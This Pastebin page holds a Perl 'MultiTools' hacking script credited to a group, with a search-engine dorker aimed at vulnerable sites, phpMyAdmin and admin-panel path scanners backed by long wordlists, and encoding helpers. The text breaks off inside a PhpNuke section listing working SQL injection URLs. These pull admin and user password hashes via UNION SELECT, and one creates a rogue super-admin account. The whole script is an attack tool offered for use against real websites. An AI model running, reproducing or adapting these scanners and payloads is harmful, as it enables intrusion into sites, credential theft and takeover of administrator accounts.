Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # Dev by 1337 Brain From Team-ECF
- # Gr33tz to Rip Pappu - Akbor Hossain - xeo-1337 - S!r 3zp1r3 - No PM - Force x Brain Crush - Red X - x pirate - Lazy Mind - Dreamer 1986
- use HTTP::Request;
- use LWP::UserAgent;
- use Digest::MD5;
- use MIME::Base64;
- use LWP::Simple;
- use IO::Socket;
- use HTTP::Request::Common;
- use Term::ANSIColor;
- use Win32::Console::ANSI;
- system('cls');
- system('title Scanner v1.0 by Team-ECF');
- print color("green"),"======================================================\n";
- print color("green")," MultiTools r1z <= 1.0.1 beta \n";
- print color("green")," [#] Team-ECF [#] \n";
- print color("red"), " Coded by 1337 Brain \n";
- print color("green"), "======================================================\n";
- print color("green"),"[1] Joomla Scanner\n";
- print color("green"),"[2] Md5 Encoder\n";
- print color("green"), "[3] PhpMyAdmin finder\n";
- print color("green"), "[4] Admin Panel finder\n";
- print color("green"), "[5] Base64 Encoder\n";
- print color("green"), "[6] Base64 Decoder\n";
- print color("green"), "[7] PhpNuke Sql Scanner\n";
- print color("green"), "[8] Dorker Bing\n";
- print color("green"), "[9] About Us\n\n";
- print "[+] Choose Number : ";
- my $targett = <>;
- chomp $targett;
- if($targett eq '8')
- {
- system('cls');
- system('color a');
- print q{
- +----------------------[Dorker bing]--------------------+
- | |
- | Edited By Team-ECF |
- | result in done.txt |
- +-------------------------------------------------------+
- };
- print "\nDork:";
- print "\n(Ex: index.php+site:.il )\n";
- print "=>";
- $dork = <STDIN>;
- chomp($dork);
- print "Scan Start!";
- for ($i = 0; $i < 1000; $i += 10) {
- $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
- $b->timeout(30);
- $b->env_proxy;
- $c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
- $check = index($c, 'sb_pagN');
- while (1) {
- $n = index($c, '<h3><a href="');
- if ($n == -1) {
- last;
- }
- print "$s\n";
- $c = substr($c, $n + 13);
- $s = substr($c, 0, index($c, '"'));
- open (txt,">>done.txt");
- print txt $s,"\n";
- close(txt);
- }
- if ($check == -1) {
- last;
- }
- }
- print "Scan Finished!";
- system("done.txt");
- exit;
- }
- if($targett eq '9')
- {
- system('cls');
- system('title About Us');
- print "
- \t
- \t :::==== :::===== :::==== :::=======
- \t :::==== ::: ::: === ::: === ===
- \t === ====== ======== === === ===
- \t === === === === === ===
- \t === ======== === === === ===
- \t:::======= :::==== :::=== :::==== :::====
- \t::: === === ::: === ::: :::==== ::: ===
- \t=== === === === === ===== === ========
- \t=== === === === === === === ===
- \t=== === ====== ====== === === ===
- \n";
- print "\tT00ls Dev by 1337 Brain\n";
- print "\tFrom Team-ECF\n";
- print "\tSpecial Greetz To All Member of Team-ECF\n";
- print "\t[*] Do you want open Team-ECF (y/n) => ";
- my $openit = <>;
- chomp($openit);
- if($openit eq "y")
- {
- system('start http://ecf.me/');
- }
- else
- {
- print "\t<----TeaM-ECF---->";
- }
- }
- if($targett eq '2')
- {
- system('cls');
- system('title Md5 Encoder');
- {
- print " Md5 Encoder !!!!! \n";
- print " Enter Your String:";
- $md=<STDIN>;
- chomp $md;
- print Digest::MD5->md5_hex("$md")
- }
- }
- if($targett eq '3')
- { #Script Coded By 1337 Brain (me :)
- system('cls');
- system('title PhpMyAdmin FInder');
- @pathh=('/phpMyAdmin/',
- '/phpmyadmin/',
- '/PMA/',
- '/pma/',
- '/admin/',
- '/dbadmin/',
- '/mysql/',
- '/myadmin/',
- '/phpmyadmin2/',
- '/phpMyAdmin2/',
- '/phpMyAdmin-2/',
- '/php-my-admin/',
- '/phpMyAdmin-2.2.3/',
- '/phpMyAdmin-2.2.6/',
- '/phpMyAdmin-2.5.1/',
- '/phpMyAdmin-2.5.4/',
- '/phpMyAdmin-2.5.5-rc1/',
- '/phpMyAdmin-2.5.5-rc2/',
- '/phpMyAdmin-2.5.5/',
- '/phpMyAdmin-2.5.5-pl1/',
- '/phpMyAdmin-2.5.6-rc1/',
- '/phpMyAdmin-2.5.6-rc2/',
- '/phpMyAdmin-2.5.6/',
- '/phpMyAdmin-2.5.7/',
- '/phpMyAdmin-2.5.7-pl1/',
- '/phpMyAdmin-2.6.0-alpha/',
- '/phpMyAdmin-2.6.0-alpha2/',
- '/phpMyAdmin-2.6.0-beta1/',
- '/phpMyAdmin-2.6.0-beta2/',
- '/phpMyAdmin-2.6.0-rc1/',
- '/phpMyAdmin-2.6.0-rc2/',
- '/phpMyAdmin-2.6.0-rc3/',
- '/phpMyAdmin-2.6.0/',
- '/phpMyAdmin-2.6.0-pl1/',
- '/phpMyAdmin-2.6.0-pl2/',
- '/phpMyAdmin-2.6.0-pl3/',
- '/phpMyAdmin-2.6.1-rc1/',
- '/phpMyAdmin-2.6.1-rc2/',
- '/phpMyAdmin-2.6.1/',
- '/phpMyAdmin-2.6.1-pl1/',
- '/phpMyAdmin-2.6.1-pl2/',
- '/phpMyAdmin-2.6.1-pl3/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2-beta1/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2/',
- '/phpMyAdmin-2.6.2-pl1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-rc1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-pl1/',
- '/phpMyAdmin-2.6.4-rc1/',
- '/phpMyAdmin-2.6.4-pl1/',
- '/phpMyAdmin-2.6.4-pl2/',
- '/phpMyAdmin-2.6.4-pl3/',
- '/phpMyAdmin-2.6.4-pl4/',
- '/phpMyAdmin-2.6.4/',
- '/phpMyAdmin-2.7.0-beta1/',
- '/phpMyAdmin-2.7.0-rc1/',
- '/phpMyAdmin-2.7.0-pl1/',
- '/phpMyAdmin-2.7.0-pl2/',
- '/phpMyAdmin-2.7.0/',
- '/phpMyAdmin-2.8.0-beta1/',
- '/phpMyAdmin-2.8.0-rc1/',
- '/phpMyAdmin-2.8.0-rc2/',
- '/phpMyAdmin-2.8.0/',
- '/phpMyAdmin-2.8.0.1/',
- '/phpMyAdmin-2.8.0.2/',
- '/phpMyAdmin-2.8.0.3/',
- '/phpMyAdmin-2.8.0.4/',
- '/phpMyAdmin-2.8.1-rc1/',
- '/phpMyAdmin-2.8.1/',
- '/phpMyAdmin-2.8.2/',
- '/sqlmanager/',
- '/mysqlmanager/',
- '/p/m/a/',
- '/PMA2005/',
- '/pma2005/',
- '/phpmanager/',
- '/php-myadmin/',
- '/phpmy-admin/',
- '/webadmin/',
- '/sqlweb/',
- '/websql/',
- '/webdb/',
- '/mysqladmin/',
- '/mysql-admin/',
- '/mya/',
- );
- print "PhpMyAdmin Finder !! :p \n";
- print "result in PhpMyadmin.txt \n";
- print "Enter Target:";
- my $trget = <>;
- chomp $trget;
- foreach $pathh(@pathh){
- my $URLll = $trget.$pathh;
- my $Source = get $URLll;
- die "Can not get $URLll" unless defined $URLll;
- if ($Source =~ /phpMyAdmin/ || /Welcome to phpMyAdmin/ || /Username/ || /Password/) { $Messageee ="PhpMyAdmin P4n3l F!nded";}
- else { $Messageee = "P4n3l Not F0und ";}
- print "$URLll => $Messageee\n";
- print "\n \n \n \n \t \t \t \t FINISH ";
- open (TEXT, '>>PhpMyadmin.txt');
- print TEXT "\n$URLll => $Messageee \n\n";
- close (TEXT);
- }
- }
- if($targett eq '4')
- { #Script Original Coded By Tartou2
- system('cls');
- system('title Admin Panel Finder');
- print " Enter Target \n";
- print" e.g.: www.target.co.il or www.target.co.il/path\n";
- print" --> ";
- $site=<STDIN>;
- chomp $site;
- print "\n\n";
- print " Enter the coding language of the website \n";
- print" e.g.: asp, php, cfm, other\n";
- print" If you don't know the launguage used in the coding then simply type ** other ** \n";
- print"--> ";
- $code=<STDIN>;
- chomp($code);
- if ( $site !~ /^http:/ ) {
- $site = 'http://' . $site;
- }
- if ( $site !~ /\/$/ ) {
- $site = $site . '/';
- }
- print "\n";
- print "->The website: $site\n";
- print "->Source of the website: $code\n";
- print "->Scan of the admin control panel is progressing...\n\n\n";
- if($code eq "asp"){
- @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
- 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
- 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
- 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
- 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
- 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
- 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
- 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
- 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
- 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
- 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
- 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
- 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
- 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
- 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
- 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
- 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
- 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
- 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
- );
- foreach $ways(@path1){
- $final=$site.$ways;
- my $req=HTTP::Request->new(GET=>$final);
- my $ua=LWP::UserAgent->new();
- $ua->timeout(30);
- my $response=$ua->request($req);
- if($response->content =~ /Username/ ||
- $response->content =~ /Password/ ||
- $response->content =~ /username/ ||
- $response->content =~ /password/ ||
- $response->content =~ /USERNAME/ ||
- $response->content =~ /PASSWORD/ ||
- $response->content =~ /Senha/ ||
- $response->content =~ /senha/ ||
- $response->content =~ /Personal/ ||
- $response->content =~ /Usuario/ ||
- $response->content =~ /Clave/ ||
- $response->content =~ /Usager/ ||
- $response->content =~ /usager/ ||
- $response->content =~ /Sing/ ||
- $response->content =~ /passe/ ||
- $response->content =~ /P\/W/ ||
- $response->content =~ /Admin Password/
- ){
- print " \n [+] Found -> $final\n\n";
- print " \n The Login Page Finded \n\n Good Job \n\n";
- }else{
- print "[-] Not Found <- $final\n";
- }
- }
- }
- # -------------------test cfm ---------------------------|
- if($code eq "cfm"){
- @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
- 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
- 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
- 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
- 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
- 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
- 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
- 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
- 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
- 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
- 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html',
- 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
- 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
- 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
- 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
- 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html',
- 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
- 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
- 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html'
- );
- foreach $ways(@path1){
- $final=$site.$ways;
- my $req=HTTP::Request->new(GET=>$final);
- my $ua=LWP::UserAgent->new();
- $ua->timeout(30);
- my $response=$ua->request($req);
- if($response->content =~ /Username/ ||
- $response->content =~ /Password/ ||
- $response->content =~ /username/ ||
- $response->content =~ /password/ ||
- $response->content =~ /USERNAME/ ||
- $response->content =~ /PASSWORD/ ||
- $response->content =~ /Senha/ ||
- $response->content =~ /senha/ ||
- $response->content =~ /Personal/ ||
- $response->content =~ /Usuario/ ||
- $response->content =~ /Clave/ ||
- $response->content =~ /Usager/ ||
- $response->content =~ /usager/ ||
- $response->content =~ /Sing/ ||
- $response->content =~ /passe/ ||
- $response->content =~ /P\/W/ ||
- $response->content =~ /Admin Password/
- ){
- print " \n [+] Found -> $final\n\n";
- print " \n The login Page Found \n\n Good Job \n\n";
- }else{
- print "[-] Not Found <- $final\n";
- }
- }
- }
- #--------------------------/test php-------------------------|
- if($code eq "php"){
- @path2=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
- 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
- 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
- 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
- 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
- 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
- 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
- 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
- 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
- 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
- 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
- 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
- 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
- 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
- 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
- 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
- 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
- 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
- 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
- );
- foreach $ways(@path2){
- $final=$site.$ways;
- my $req=HTTP::Request->new(GET=>$final);
- my $ua=LWP::UserAgent->new();
- $ua->timeout(30);
- my $response=$ua->request($req);
- if($response->content =~ /Username/ ||
- $response->content =~ /Password/ ||
- $response->content =~ /username/ ||
- $response->content =~ /password/ ||
- $response->content =~ /USERNAME/ ||
- $response->content =~ /PASSWORD/ ||
- $response->content =~ /Senha/ ||
- $response->content =~ /senha/ ||
- $response->content =~ /Personal/ ||
- $response->content =~ /Usuario/ ||
- $response->content =~ /Clave/ ||
- $response->content =~ /Usager/ ||
- $response->content =~ /usager/ ||
- $response->content =~ /Sing/ ||
- $response->content =~ /passe/ ||
- $response->content =~ /P\/W/ ||
- $response->content =~ /Admin Password/
- ){
- print " \n [+] Found -> $final\n\n";
- print " \n Login Page Finded \n\n Good :) \n\n";
- }else{
- print "[-] Not Found <- $final\n";
- }
- }
- }
- # ----------------------- other ---------------------------|
- if($code eq "other"){
- @path1=('_admin/','backoffice/','account.asp','account.cfm','account.html','account.php','acct_login/','adm.asp','adm.cfm','adm.html','adm.php','adm/','adm/admloginuser.asp','adm/admloginuser.cfm','adm/admloginuser.php','adm/index.asp','adm/index.cfm','adm/index.html','adm/index.php','adm_auth.asp','adm_auth.cfm','adm_auth.php','admin.asp','admin.cfm','admin.html','admin.php','admin/','admin/account.asp','admin/account.cfm','admin/account.html','admin/account.php','admin/admin.asp','admin/admin.cfm','admin/admin.html','admin/admin.php','admin/admin_login.asp','admin/admin_login.cfm','admin/admin_login.html','admin/admin_login.php','admin/adminLogin.asp','admin/admin-login.asp','admin/adminLogin.cfm','admin/admin-login.cfm','admin/adminLogin.html','admin/admin-login.html','admin/adminLogin.php','admin/admin-login.php','admin/controlpanel.asp','admin/controlpanel.cfm','admin/controlpanel.html','admin/controlpanel.php','admin/cp.asp','admin/cp.cfm','admin/cp.html','admin/cp.php','admin/home.asp','admin/home.cfm','admin/home.html','admin/home.php','admin/index.asp','admin/index.cfm','admin/index.html','admin/index.php','admin/login.asp','admin/login.cfm','admin/login.html','admin/login.php','admin_area/','admin_area/admin.asp','admin_area/admin.cfm','admin_area/admin.html','admin_area/admin.php','admin_area/index.asp','admin_area/index.cfm','admin_area/index.html','admin_area/index.php','admin_area/login.asp','admin_area/login.cfm','admin_area/login.html','admin_area/login.php','admin_login.asp','admin_login.cfm','admin_login.html','admin_login.php','admin1.asp','admin1.html','admin1.php','admin1/','admin2.asp','admin2.cfm','admin2.html','admin2.php','admin2/index.asp','admin2/index.cfm','admin2/index.php','admin2/login.asp','admin2/login.cfm','admin2/login.php','admin4_account/','admin4_colon/','adminarea/','adminarea/admin.asp','adminarea/admin.cfm','adminarea/admin.html','adminarea/admin.php','adminarea/index.asp','adminarea/index.cfm','adminarea/index.html','adminarea/index.php','adminarea/login.asp','adminarea/login.cfm','adminarea/login.html','adminarea/login.php','admincontrol.asp','admincontrol.cfm','admincontrol.html','admincontrol.php','admincontrol/login.asp','admincontrol/login.cfm','admincontrol/login.html','admincontrol/login.php','admincp/index.asp','admincp/index.cfm','admincp/index.html','admincp/login.asp','admincp/login.cfm','administer/','administr8.asp','administr8.html','administr8.php','administr8/','administratie/','administration.html','administration.php','administration/','administrator.asp','administrator.cfm','administrator.html','administrator.php','administrator/','administrator/account.asp','administrator/account.cfm','administrator/account.html','administrator/account.php','administrator/index.asp','administrator/index.cfm','administrator/index.html','administrator/index.php','administrator/login.asp','administrator/login.cfm','administrator/login.html','administrator/login.php','administratoraccounts/','administratorlogin.asp','administratorlogin.cfm','administratorlogin.php','administratorlogin/','administrators/','administrivia/','adminLogin.asp','admin-login.asp','adminLogin.cfm','admin-login.cfm','adminLogin.html','admin-login.html','adminLogin.php','admin-login.php','adminLogin/','adminpanel.asp','adminpanel.cfm','adminpanel.html','adminpanel.php','adminpro/','admins.asp','admins.html','admins.php','admins/','AdminTools/','admloginuser.asp','admloginuser.cfm','admloginuser.php','affiliate.asp','affiliate.cfm','affiliate.php','autologin/','banneradmin/','bbadmin/','bb-admin/','bb-admin/admin.asp','bb-admin/admin.cfm','bb-admin/admin.html','bb-admin/admin.php','bb-admin/index.asp','bb-admin/index.cfm','bb-admin/index.html','bb-admin/index.php','bb-admin/login.asp','bb-admin/login.cfm','bb-admin/login.html','bb-admin/login.php','bigadmin/','blogindex/','cadmins/','ccp14admin/','cmsadmin/','controlpanel.asp','controlpanel.cfm','controlpanel.html','controlpanel.php','controlpanel/','cp.asp','cp.cfm','cp.html','cp.php','cPanel/','cpanel_file/','customer_login/','database_administration/','directadmin/','dir-login/','ezsqliteadmin/','fileadmin.asp','fileadmin.html','fileadmin.php','fileadmin/','formslogin/','globes_admin/','home.asp','home.cfm','home.html','home.php','hpwebjetadmin/','Indy_admin/','instadmin/','irc-macadmin/','LiveUser_Admin/','login.asp','login.cfm','login.html','login.php','login_db/','login1/','loginflat/','login-redirect/','login-us/','logo_sysadmin/','Lotus_Domino_Admin/','macadmin/','manuallogin/','memberadmin.asp','memberadmin.cfm','memberadmin.php','memberadmin/','members/','memlogin/','meta_login/','modelsearch/admin.asp','modelsearch/admin.cfm','modelsearch/admin.html','modelsearch/admin.php','modelsearch/index.asp','modelsearch/index.cfm','modelsearch/index.html','modelsearch/index.php','modelsearch/login.asp','modelsearch/login.cfm','modelsearch/login.html','modelsearch/login.php','moderator.asp','moderator.cfm','moderator.html','moderator.php','moderator/','moderator/admin.asp','moderator/admin.cfm','moderator/admin.html','moderator/admin.php','moderator/login.asp','moderator/login.cfm','moderator/login.html','moderator/login.php','myadmin/','navSiteAdmin/','newsadmin/','nsw/admin/login.php','openvpnadmin/','pages/admin/admin-login.asp','pages/admin/admin-login.cfm','pages/admin/admin-login.html','pages/admin/admin-login.php','panel/','panel-administracion/','panel-administracion/admin.asp','panel-administracion/admin.cfm','panel-administracion/admin.html','panel-administracion/admin.php','panel-administracion/index.asp','panel-administracion/index.cfm','panel-administracion/index.html','panel-administracion/index.php','panel-administracion/login.asp','panel-administracion/login.cfm','panel-administracion/login.html','panel-administracion/login.php','pgadmin/','phpldapadmin/','phpmyadmin/','phppgadmin/','phpSQLiteAdmin/','platz_login/','power_user/','project-admins/','pureadmin/','radmind/','radmind-1/','rcjakar/admin/login.php','rcLogin/','Server.asp','Server.html','Server.php','server/','server_admin_small/','ServerAdministrator/','showlogin/','simpleLogin/','siteadmin/index.asp','siteadmin/index.cfm','siteadmin/index.php','siteadmin/login.asp','siteadmin/login.cfm','siteadmin/login.html','siteadmin/login.php','smblogin/','sql-admin/','ss_vms_admin_sm/','sshadmin/','staradmin/','sub-login/','Super-Admin/','support_login/','sysadmin.asp','sysadmin.html','sysadmin.php','sysadmin/','sys-admin/','SysAdmin2/','sysadmins/','system_administration/','system-administration/','typo3/','ur-admin.asp','ur-admin.html','ur-admin.php','ur-admin/','user.asp','user.html','user.php','useradmin/','UserLogin/','utility_login/','vadmind/','vmailadmin/','webadmin.asp','webadmin.cfm','webadmin.html','webadmin.php','WebAdmin/','webadmin/admin.asp','webadmin/admin.cfm','webadmin/admin.html','webadmin/admin.php','webadmin/index.asp','webadmin/index.cfm','webadmin/index.html','webadmin/index.php','webadmin/login.asp','webadmin/login.cfm','webadmin/login.html','webadmin/login.php','wizmysqladmin/','wp-admin/','wp-login.php','wp-login/','xlogin/','yonetici.asp','yonetici.html','yonetici.php','yonetim.asp','yonetim.html','yonetim.php','panel/?a=cp'
- );
- foreach $ways(@path1){
- $final=$site.$ways;
- my $req=HTTP::Request->new(GET=>$final);
- my $ua=LWP::UserAgent->new();
- $ua->timeout(30);
- my $response=$ua->request($req);
- if($response->content =~ /Username/ ||
- $response->content =~ /Password/ ||
- $response->content =~ /username/ ||
- $response->content =~ /password/ ||
- $response->content =~ /USERNAME/ ||
- $response->content =~ /PASSWORD/ ||
- $response->content =~ /Senha/ ||
- $response->content =~ /senha/ ||
- $response->content =~ /Personal/ ||
- $response->content =~ /Usuario/ ||
- $response->content =~ /Clave/ ||
- $response->content =~ /Usager/ ||
- $response->content =~ /usager/ ||
- $response->content =~ /Sing/ ||
- $response->content =~ /passe/ ||
- $response->content =~ /P\/W/ ||
- $response->content =~ /Admin Password/
- ){
- print " \n [+] Found -> $final\n\n";
- print " \n The Login Page Finded \n\n Good Job \n\n";
- }else{
- print "[-] Not Found <- $final\n";
- }
- }
- kill("STOP",NULL);
- }
- }
- if($targett eq '')
- {
- print "Usage: perl MultiTools.pl \n";
- exit(1);
- }
- if($targett eq '7')
- {
- @Nuke =("modules.php?name=Downloads&d_op=viewdownload&cid=59%20or%20cid=2",
- "modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/",
- "modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors",
- "modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors",
- "modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/",
- "modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors",
- "modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users",
- "modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20FROM%20nuke_users/",
- "modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors",
- "modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala",
- "index.php?&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox",
- "modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*",
- "admin.php?op=AddAuthor&add_aid=x0p0x&add_name=God&add_pwd=cool&add_email=bugs@victima&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox",
- "modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/",
- "modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2",
- "modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2",
- "modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors",
- "modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5",
- "modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors",
- "modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201",
- "modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201",
